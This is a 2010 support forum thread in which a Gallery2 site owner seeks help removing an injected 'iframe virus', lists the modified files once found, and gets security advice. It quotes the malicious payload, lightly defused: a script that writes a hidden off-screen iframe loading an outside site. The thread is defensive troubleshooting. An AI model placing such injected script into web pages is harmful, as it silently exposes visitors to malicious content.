iframe virus removal [SOLVED]

ycc

Joined: 2008-08-18
Posts: 25
Posted: Sun, 2010-05-16 15:55

I am sorry I cannot provide all information asked for. My webhosting service has got iframe-injection problems and I cannot reach my site. I use Gallery2.

When I surf to my site, Avast antivirus says "permission denied due to iframe virus in main.php"

When I turn off Avast and save the main page, it starts like this (iframe virus included)

(I inserted some X to disable possible html interpretation.)

< X !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
< X html lang="en-US">< X head>< X script> X document.write('< X iframe src="http://hulmeux.com/?click=18790379" width=100 height=100 style="position:absolute;top:-10000;left:-10000;">< X /iframe>');< X /script>< X link rel="stylesheet" type="text/css" href="main.php_files/main.css">

However, when I download main.php with ftp, I cannot find the virus. I have tried searching for it, but i am not very good with Vista search functions. My impression is also that the virus may be hidden and not easy to search for.

Please tell me in which file the virus is located so i can correct it and upload. Or please give alternative method for iframe virus removal.

Thanks

 
suprsidr
suprsidr's picture

Joined: 2005-04-17
Posts: 8339
Posted: Sun, 2010-05-16 16:18
 
ycc

Joined: 2008-08-18
Posts: 25
Posted: Sun, 2010-05-16 16:39

Thanks a million and a million more to suprsidr and this forum.

I followed the link posted:
http://www.example.com/gallery/upgrade/index.php

It gave six files as being modified, the one I had missed was in lib/smarty

install/index.php
lib/smarty/plugins/modifier.default.php
lib/support/index.php
upgrade/index.php
modules/rewrite/data/path_info/index.php
themes/matrix/templates/theme.tpl

Now I can surf my site with antivirus program turned on.

No time to write more, must continue to read the FAQ ... ;)

Thread solved.

 
nivekiam
nivekiam's picture

Joined: 2002-12-10
Posts: 16504
Posted: Sun, 2010-05-16 21:16

CHANGE YOUR PASSWORDS. Most importantly the password you use for FTP and DO NOT USE FTP. Use SFTP. Using plain FTP means that your user name and password are sent in clear text and this is actually how a large majority of sites are hacked. NEVER use FTP or Telnet. SFTP (secure ftp) or SSH only, ever.

Also, make sure you are running the latest version of any software on your site, WordPress (known for many, many vulnerabilities and another major way sites get hacked), G2 (should be running 2.3.1), etc.

I'd read through this too:
http://codex.gallery2.org/Gallery2:How_do_I_secure_Gallery2

http://codex.gallery2.org/Gallery2:Security

A lot of that applies to any web based application you run on a site.
____________________________________________
Like Gallery? Like the support? Donate now!!! See G2 live here

 
ycc

Joined: 2008-08-18
Posts: 25
Posted: Mon, 2010-05-17 07:42

nivekiam

Thanks for suggestions.

I do not know if GoDaddy offers SFTP, I will have to check. I just have a rather simple "Linux deluxe hosting" account. (Not so advanced, in spite of its name, but price and service is OK. No SSH, though)

 
nivekiam
nivekiam's picture

Joined: 2002-12-10
Posts: 16504
Posted: Mon, 2010-05-17 14:13

GoDaddy sucks. They run really old software on their servers (Apache 1.x for example) with no apparent plans on upgrading. If they don't offer secure access like SFTP at the very least then it shows even more how little they care about security or their customers and all they care about is getting a monthly payment from them.

www.pairlite.com A little bit more per month but way better service. I have other suggestions too.
____________________________________________
Like Gallery? Like the support? Donate now!!! See G2 live here

 
ycc

Joined: 2008-08-18
Posts: 25
Posted: Thu, 2010-05-20 10:14

The suggestion to tighten up the file transfer procedures is naturally a good one, thanks.

How the iframes got injected this time I am not sure about. However, during one short period iframes were written into many files at my hosting account. (Mostly by the name of index.htm, index.php and some files with "main" their name). I wrote and complained to the hosting company and got general antivirus guidelines back.

The problem then suddenly disappeared and I could gradually remove the iframes. (The last one by help in this thread.) At that time I hadn't yet changed my ftp password. My impression was that someone working at the hosting company (or otherwise having the right to run executables) had been infected by an executable program that wrote iframes into indexfiles. They then took care of the problem and it has fortunately not reappeared.